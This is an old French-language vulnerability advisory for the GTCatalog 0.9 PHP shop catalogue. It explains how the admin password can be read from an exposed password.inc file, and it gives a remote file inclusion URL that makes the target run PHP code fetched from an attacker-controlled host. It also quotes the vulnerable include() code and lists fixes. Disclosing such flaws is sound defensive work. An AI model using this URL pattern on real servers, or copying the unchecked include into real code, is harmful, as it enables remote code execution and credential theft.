							GtCatalog
							*********
Informations :
АААААААААААААА
Langage : PHP
Version : 0.9
Website : http://www.geektweaked.com
Problшmes : - Rщcuperation du mot de passe administrateur
	    - Inclusion de fichier



Developpement :
ААААААААААААААА
GTCatalog est un catalogue de commerce, affichant des articles, leur prix, une description, une photo de l'article, 
et contenant une partie administrative.

La premiшre faille vient du fait que le mot de passe admin est contenu dans un fichier .inc, dans la variable $globalpw.
Les fichiers .inc peuvent ъtre lu par tous, donc celui-ci aussi ! Le fichier est password.inc. Pour rщcuperer
le mot de passe admin de http://[target]/, il suffira donc de se rendre sur http://[target]/password.inc .


La deuxiшme faille se trouve dans le fichier principal index.php.
On peut y voir le code suivant :
-------------------------------------------------------------------------------------------------------
[...]
switch ($function)
{

case "custom":

$cc	= new Template();
	$cc->set_file("head",$dir_base.$dir_template."header.inc");
	$cc->set_var(array(                      		'clientcode' => $cfg_clientcode,
								'title' => $cfg_title." - ".$custom));
$cc->parse("output","head");
$cc->p("output");

include($custom.".custom.inc");
include ($dir_base.$dir_template."footer.inc");

break;
[...]
-------------------------------------------------------------------------------------------------------
Les variables $dir_base et $dir_template sont dщfinie dans config.inc, lui-mъme inclut auparavant dans index.php,
la ligne
-----------------------------------------------
include ($dir_base.$dir_template."footer.inc");
-----------------------------------------------
n'est donc pas utilisable.
Mais la ligne
-------------------------------
include($custom.".custom.inc");
-------------------------------
l'est, elle, car la variable $custom n'est dщfinie nulle part.
Donc si le fichier http://[attacker]/1.custom.inc est crщщ, contenant un code PHP, ce code pourra ъtre executщ sur le 
serveur [target], et avec ses droits et restrictions, avec une url du type :
http://[target]/index.php?function=custom&custom=http://[attacker]/1


Solutions :
ААААААААААА
- Renommer le fichier password.inc en password.inc.php, et changer l'include() correspondant au dщbut d'index.php.
- Vщrifier que $custom.".custom.inc" est bien un fichier local, grтce par exemple р la fonction file_exists().

Un patch peut ъtre trouvщ sur http://www.phpsecure.info.


Credits :
ААААААААА
Auteur : frog-m@n
E-mail : frog-man@phpsecure.info
Website : http://www.frog-man.org, http://www.phpsecure.info .
Date : 03/03/03